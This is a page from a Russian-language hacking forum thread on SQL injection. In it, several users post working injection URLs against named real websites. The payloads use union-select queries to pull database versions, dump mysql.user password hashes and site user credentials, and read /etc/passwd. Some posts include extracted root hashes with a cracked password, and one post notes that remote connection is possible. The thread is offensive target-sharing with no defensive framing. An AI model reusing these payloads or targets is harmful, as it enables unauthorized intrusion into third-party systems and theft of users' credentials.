SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 15 of 798
  1. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    хоть столбцы бы подобрал :p
    Code:
    http://www.gelezo.net/files.php?id=-99'+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
     
    #281 ice1k, 20 Jan 2007
  2. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://www.mtas.ru/second.php?ID=-1+union+select+1/*

    icek вот) подобрал)))
     
    #282 Sn@k3, 20 Jan 2007
  3. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    =) ну так))) кстати http://www.rudtp.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/* дальше не АСИЛИЛ
     
    #283 Sn@k3, 21 Jan 2007
  4. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    Sn@k3
    там используется 2 запроса сразу. врятли можно что-то вытащить. попробуй здесь:
    http://www.rudtp.ru/download.php?id=-2+or+1=1/*
     
    #284 p-range, 21 Jan 2007
  5. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.uprava.org/section.php?id=225+union+select+1,2,3,4,5,6,0xc7ebfeeae020e1fbeb20e7e4e5f1fc203a29/*
     
    #285 злюка, 21 Jan 2007
  6. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://galagraphics.kz/portfolio.php?id=11+union+select+1,2,3,4,password,6,7,8,9,10+from+mysql.user/*

    хэш тут в SHA-1?
     
    #286 злюка, 21 Jan 2007
  7. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    http://forum.vbios.com/

    Сайт: http://forum.vbios.com/
    Результат: выполнение SQL команд (нпр. получения пароля пользователя)
    Количество пользователей: 11013
    URL: http://forum.vbios.com/addons/kit/serverinfo.php?id=-32+union+select+1,2,3,4,5,6,7,8,9,10,null,12,concat(U_LoginName,%22:%22,U_Password)+from+w3t_Users+where+U_Name=%22Arafat%22/*
    ======
    Я сдесь не давно, кому помог не сочтите за сложность, поставьте +
     
    #287 big_BRAT, 21 Jan 2007
    1 person likes this.
  8. TreniX

    TreniX Elder - Старейшина

    Joined:
    27 May 2006
    Messages:
    19
    Likes Received:
    25
    Reputations:
    26
    Code:
    http://heraldry.com.ua/index.php3?lang=U&id=1344+union+select+0,0,0,VERSION(),0,0,0,0,0,0,0,0/*
http://mobile.ru/news.php?news_id=-1+union+select+1,USER(),1,VERSION(),1,1,1,1+/*
http://nikzdejoe.odessa.ua/?article=7425'+union+select+0,0,0/*
http://www.gazeta.tv/news.php?id=192+union+select+0,0,0,0,0,0,0/*
http://vipflat.kiev.ua/news/full_news.html?new_id=4148'+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*
     
    #288 TreniX, 21 Jan 2007
    3 people like this.
  9. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://thepiratebay.org/blog.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0/*
     
    #289 Sn@k3, 21 Jan 2007
  10. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://www.soaw.org/new/article.php?id=-2+or+1=1/*

    http://www.auditorium.ru/pers/person.php?id=-1+union+select+1,2,3,4--

    [
    http://www.rgups.ru/pages.php?id=-1+union+select+version()/*
    http://www.rgups.ru/pages.php?id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764)/* ]

    http://www.apahelpcenter.org/featuredtopics/feature.php?id=-2+or+1=@@version--
     
    #290 Sn@k3, 21 Jan 2007
    Last edited: 30 Jan 2007
  11. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Сайты они видети ли разрабатывают :mad:
    Code:
    http://www.netservice.ru/portfolio_details.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
     
    #291 ice1k, 22 Jan 2007
  12. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://nemchenko.ru/main.php?id=-99+union+select+LOAD_FILE(0x2f6574632f706173737764)/*
    aka /etc/passwd^^
    Code:
    http://nemchenko.ru/main.php?id=-99+union+select+concat(user,0x3a,password)+from+mysql.user/*
    ::
    root:5194866966b75566
    aka
    root:1q2w3e

    Коннектиться можно удалённо... ;)
     
    #292 ice1k, 22 Jan 2007
    1 person likes this.
  13. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.rolemancer.ru/article.php?sid=-1+union+select+1,2,3,concat(uname,char(58),pass,char(58),email,char(58),user_icq,char(58),name),44,6,7,8,9,11111,11+from+users+limit+16,1/*


    http://www.forsleep.ru/index.php?rn_id=-1+union+select+1,version(),3,4,5,6,7/*
     
    #293 *D1VER, 22 Jan 2007
    Last edited: 22 Jan 2007
  14. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://www.ipecac.com/bio.php?id=-1+union+select+1,2,3,system_user()/*
     
    #294 Sn@k3, 22 Jan 2007
  15. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.cognos.ru/stuff/news_bd.php?n_cod=-1+union+select+1,2,3,4,user(),version()/*
     
    #295 *D1VER, 22 Jan 2007
  16. Kryonn

    Kryonn New Member

    Joined:
    21 Jan 2007
    Messages:
    3
    Likes Received:
    3
    Reputations:
    0
    http://www.amic.ru/forum/?topic=980990+union+select+1,2,3,4,5,version(),7,8,9,10,11/*&page=55
    Таблица user.
     
    #296 Kryonn, 22 Jan 2007
    1 person likes this.
  17. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://advancedcatalog.com.ru/modules.php?name=Web_Links&l_op=viewlink&cid=-1+union+select+1,2/*&min=600&orderby=hitsA&show=20
    искал по экзамену.... вообщем в первой колонке реален вывод...

    http://www.ckn.ru/srochnoall.php?id=-1+union+select+1,2,3,4,5,6,7,8/*


    http://www.keckobservatory.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
     
    #297 Sn@k3, 22 Jan 2007
    Last edited: 22 Jan 2007
  18. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    http://rss2.ru/read.php?id=-99+union+select+1,convert(user+using+cp1251),convert(password+using+cp1251),4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
     
    #298 ice1k, 22 Jan 2007
    1 person likes this.
  19. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    http://www.atvmedia.ru/read.php?id=-99+union+select+1,2,3,4,user,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user/*
    root:3a27e90e7ddcbf0f
    root:a878
    =\
     
    #299 ice1k, 22 Jan 2007
  20. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.patentoved.com/content.php?id=-99'+union+select+user()/*
     
    #300 ice1k, 23 Jan 2007
(You must log in or sign up to post here.)
Page 15 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.